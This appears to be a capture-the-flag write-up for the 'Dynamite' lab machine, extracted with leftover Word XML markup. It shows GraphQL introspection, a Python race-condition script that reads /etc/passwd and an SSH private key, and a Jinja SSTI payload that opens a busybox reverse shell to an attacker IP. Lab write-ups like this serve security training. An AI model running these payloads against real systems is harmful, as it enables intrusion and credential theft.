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1e4u32u166k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Dynamite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machine.If you require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eu7cvs5m6cfq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reconnaissance phase begins with scanning ports and services. First, the machine’s IP was exported as a variable to be used in subsequent commands.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IP=&lt;IP_DA_MÁQUINA&gt;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the port scan, services were identified running on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 results also indicate an entry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robots.txt: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$IP -v -Pn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72150" cy="1799228"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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263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992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1 - Machine port scan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web page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see a dynamite e-commerce site, but the products are not loading. Opening the browser console reveals a CORS error referencing the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dynamite.hc.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6099225" cy="3054461"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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52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9225" cy="30544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2 - Accessing the application shows a CORS error when loading products</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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4591050" cy="1428750"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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28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3 - Adding the domain to the /etc/hosts file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application again via the hostname, the products load successfully.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095875" cy="2808525"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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0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08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4 - Products loaded in the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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/robots.txt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reveals an entry for the file main.go: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262438" cy="843789"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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8437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5 - robots.txt file contains an entry disallowing main.go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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accessing a product and inspecting the requests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Developer Mode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(F12 → Network tab), we can see that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GraphQL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 being used.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471988" cy="3573506"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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318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5735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6 - Request made to /graphql endpoint on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Intercepting the request with Burp Suite and sending it to Repeater allows us to modify it before forwarding. To discover all possible queries, we can test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whether introspection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enabled using the following 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{"query":"{__schema{types{name,fields{name}}}}"}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7125"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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249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7 - Performing the introspection query reveals the entire API schema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Reading the response, we find an object called File, which suggests it reads files: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947988" cy="3075370"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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0753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8 - Introspection response showing an object named “File”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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heading=h.6i4nzus62jt2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making a request with the path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the query, the server responds with an invalid or dangerous path message.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{"query": "{ file(path: \"/etc/passwd\") { content } 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3772904" cy="4722665"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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801" r="488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904" cy="472266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9 - Response for /etc/passwd request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Apparently, the application filters malicious file paths. However, as seen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robots.txt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there may be a source file called “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main.go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 at the project root. Requesting this file reveals the entire application source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{"query": "{ file(path: \"main.go\") { content } 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03043" cy="3264011"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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288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043" cy="32640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10 - Request for main.go file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Reviewing the code, we identify where forbidden file access is controlled. There is a regular expression (regex) filtering which files are allowed to be read. If the requested file does not match the regex, the variable failed is assigned an error value.</w:t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0302" cy="4757531"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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0302" cy="475753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11 - Request for main.go file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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variable failed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assigned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that code block but is not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declared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inside the function. Searching further, we see that it is declared at the top of the file as a global variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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114550" cy="923497"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2349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12 - Global declaration of the error variable “failed”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Go supports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concurrency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features such as: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Goroutines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lightweight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threads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managed by the Go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communication mechanism between Goroutines.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Memória compartilhada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variables in memory can be accessed by multiple Goroutines.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failed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 declared globally, its content is shared between threads. If we manage to assign it a nil value before the file-reading logic checks it (for example, during a sleep loop), it becomes possible to read restricted files despite violating the regex, creating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race condition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vulnerability.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it, we can send repeated requests rapidly, forcing failed to remain nil. This can be achieved by alternating requests between an allowed file (e.g., main.go) and a restricted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(e.g., /etc/passwd)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Below is a Python script to exploit this condition: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f'http://{sys.argv[1]}:{sys.argv[2]}'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worker(path,queue):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f'{{ file(path: "{path}") {{ name, path, content }} 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f"{URL}/graphql"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data=json.dumps(query),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queue.put(r.text)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'main.go'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'/etc/passwd'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script sends parallel requests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“main.go”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“/etc/passwd”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prints the output once /etc/passwd is successfully returned without an error.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Execute the script with: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python3 exploit.py dynamite.hc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792634" cy="3499088"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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34" cy="3499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13 - Exploiting Path Traversal via Race Condition and retrieving /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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script output displays existing users on the machine. We observe a user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By adapting the script, we can read other files, such as the SSH private key of user dyna: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f'http://{sys.argv[1]}:{sys.argv[2]}'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worker(path,queue):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f'{{ file(path: "{path}") {{ name, path, content }} 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f"{URL}/graphql"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data=json.dumps(query),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'rsa'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'BEGIN'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queue.put(r.text)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'main.go'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'/home/dyna/.ssh/id_rsa'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script execution reveals the contents of dyna’s private key.</w:t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995863" cy="4387392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387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14 - Exploiting Path Traversal via Race Condition to retrieve the SSH key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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SSH key, we connect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obtain the first flag:</w:t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613135" cy="5070713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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135" cy="5070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15 - Authenticating with dyna’s SSH key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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y7vcynm6dezj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Enumerating the machine, we discover a service running internally on port 5000.</w:t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76888" cy="1754319"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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7543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16 - Service enumeration reveals an internal service on port 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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SSH key, we return to our attack machine and set up port forwarding to access the internal service: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0.0.0.0:5000:localhost:5000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dyna@dynamite.hc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now access the application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localhost:5000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attack machine.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2903775"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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208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17 - Order escort application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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inspection, we discover the application is vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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SSTI Jinja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using the payload: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{{7*7}}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8225" cy="2739550"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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39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18 - Application returns 49, confirming Jinja SSTI vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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We then craft a reverse shell payload. First, start a listener on the attack machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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3090863" cy="359403"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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91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594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19 - Listener on port 80 of the attack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With the following payload, we obtain a reverse shell:</w:t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{{request.application.__globals__.__builtins__.__import__('os').popen('busybox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&lt;IP_VPN&gt;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bash').read()}}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We observe that the application runs as root. Finally, we retrieve the root flag from the /root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9625" cy="2951654"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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516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20 - Obtaining reverse shell and retrieving root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.73vwbr8huu0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3" name="image16.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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1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0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Dynamite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2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30018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25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx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hyperlink" Target="https://app.hackingclub.com/training/training-machines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1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/graphql.html#introspection" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml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0rsFKQIJcdrfZKLQJPvRroFiTQ==">CgMxLjAyDmguMWU0dTMydTE2Nms1Mg5oLjZnanl5Znd5aXUwMjIOaC5ldTdjdnM1bTZjZnEyDmguNmk0bnp1czYyanQyMg5oLnk3dmN5bm02ZGV6ajINaC43M3Z3YnI4aHV1MDgAciExQkpGWVlTekYyU0NjbGt2OGJDcjlGaFhYSzlFMGN1MVY=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